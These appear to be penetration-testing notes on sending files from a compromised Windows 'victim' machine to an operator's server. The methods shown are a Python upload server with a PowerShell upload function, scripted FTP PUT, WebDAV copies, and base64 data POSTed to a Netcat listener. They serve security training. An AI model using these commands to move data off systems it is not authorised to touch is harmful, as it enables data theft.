Note
- Some Operations May Be Blocked Due to Windows
Firewall - Policies. Outbound Trafficis usually Disallowed usingHTTP (TCP/80)andHTTPS (TCP/443)Protocols.- The
Default Portsthat the Services use Down Below Might be Blocked Or Filtered byIDS - Firewall - Policies.
Note
Server- Basic Queries to setup a Running Server.Target- These Operations should be done on the Victim Machine.Interactive- We Log into a Remote Machine via RDP - SSH etc..Non Interactive- Commands run in their own Subshell and this Shell is not Interactive. Opens to Execute but closes Immediately.
Python Web Server
- Server HTTP/S
- Target
- PowerShell Script
:: Requires [uploadserver] Package && [PSUpload.ps1] Powershell Script
:: HTTP Server
python3 -m uploadserver
:: HTTPS Server
:: Create a Self-Signed Certificate
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
:: Start the Web Server
mkdir https && cd https
python3 -m uploadserver 443 --server-certificate /<OPENSSL [server.pem] Location>
# Import the PowerShell Script
Import-Module .\PSUpload.ps1
# Upload the File to the Upload Server
# Default Folder [/upload]
Invoke-FileUpload -Uri http://<IP>/upload -File C:\<File Name>
<#
PowerShell Script to upload files using uploadserver module
Github: https://github.com/Densaugeo/uploadserver
To execute the server run in your Linux Machine:
pip3 install uploadserver
python3 -m uploadserver
Example PS:
Invoke-FileUpload -File C:\Users\plaintext\Desktop\20200717080254_BloodHound.zip -Uri http://192.168.49.128:8000/upload
References: https://gist.github.com/arichika/91a8b1f60c87512401e320a614099283
#>
function Invoke-FileUpload {
Param (
[Parameter(Position = 0, Mandatory = $True)]
[String]$File,
[Parameter(Position = 1, Mandatory = $True)]
[String]$Uri
)
$FileToUpload = Get-ChildItem -File "$File"
$UTF8woBOM = New-Object "System.Text.UTF8Encoding" -ArgumentList @($false)
$boundary = '----BCA246E0-E2CF-48ED-AACE-58B35D68B513'
$tempFile = New-TemporaryFile
Remove-Item $tempFile -Force -ErrorAction Ignore
$sw = New-Object System.IO.StreamWriter($tempFile, $true, $UTF8woBOM)
$fileName = [System.IO.Path]::GetFileName($FileToUpload.FullName)
$sw.Write("--$boundary`r`nContent-Disposition: form-data;name=`"files`";filename=`"$fileName`"`r`n`r`n")
$sw.Close()
$fs = New-Object System.IO.FileStream($tempFile, [System.IO.FileMode]::Append)
$bw = New-Object System.IO.BinaryWriter($fs)
$fileBinary = [System.IO.File]::ReadAllBytes($FileToUpload.FullName)
$bw.Write($fileBinary)
$bw.Close()
$sw = New-Object System.IO.StreamWriter($tempFile, $true, $UTF8woBOM)
$sw.Write("`r`n--$boundary--`r`n")
$sw.Close()
Invoke-RestMethod -Method POST -Uri $uri -ContentType "multipart/form-data; boundary=$boundary" -InFile $tempFile
$FileHash = Get-FileHash -Path "$File" -Algorith MD5
Write-Host "[+] File Uploaded: " $FileToUpload.FullName
Write-Host "[+] FileHash: " $FileHash.Hash
}
FTP
- Server
- Interactive
- Non Interactive
:: Requires [pyftpdlib] Package
:: Start The Server
python3 -m pyftpdlib --port 21
:: Interactive SHELL
:: Access The Server
:: [USER: anonymous PASSWORD: anonymous]
:: [PUT] - Upload The File
ftp ➜ open ➜ IP ➜ PUT "File Name"
:: Non Interactive SHELL
:: Target
echo open IP > FTP.txt
echo USER anonymous >> FTP.txt
echo anonymous >> FTP.txt
echo PUT FILE.exe >> FTP.txt
echo bye >> FTP.txt
:: Upload The File
ftp -v -n -s:FTP.txt
# PSH Upload Method
(New-Object Net.WebClient).UploadFile('ftp://<IP>/<File Name>', '<Output>')
WebDav
- Server
- Target
:: Requires [wsgidav - cheroot] Packages
wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
Note
DavWWWRoot is a Special Keyword recognized by the Windows Shell. No such folder exists on your WebDAV Server.
The Keyword tells the Mini-Redirector Driver, which handles WebDAV Requests that you are Connecting to the Root of the WebDAV Server.
**We can avoid using this Keyword if we specify a Folder that exists on our Server when Connecting to the Server. **
:: List WebDav Share Contents
dir \\<IP>\DavWWWRoot
:: Upload Files
copy C:<File Name> \\<IP>\DavWWWRoot\
copy C:<File Name> \\<IP>\<Share Folder>\
PSH [BASE64]
# PowerShell Base64 Encode && Decode
[Convert]::ToBase64String((Get-Content -path "C:\<File Name>" -Encoding byte))
# Compare the File Hash
Get-FileHash "C:\<File Name>" -Algorithm MD5
# Decode Base64
echo "<BASE64>" | base64 -d > <Output>
# [Invoke-WebRequest] Method
# [Invoke-RestMethod] is also Available
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\<File Name>' -Encoding Byte))
Invoke-WebRequest -Uri http://<IP>:<Netcat Port>/ -Method POST -Body $b64
# We can catch the Base64 Data with [Netcat]
nc -nvlp <PORT>
# Decode Base64
echo "<BASE64>" | base64 -d -w 0 > <Output>
SCP
:: Copy Local File to the Remote System
scp -P 22 "<File Name>" <Username>@<IP>:/<Output>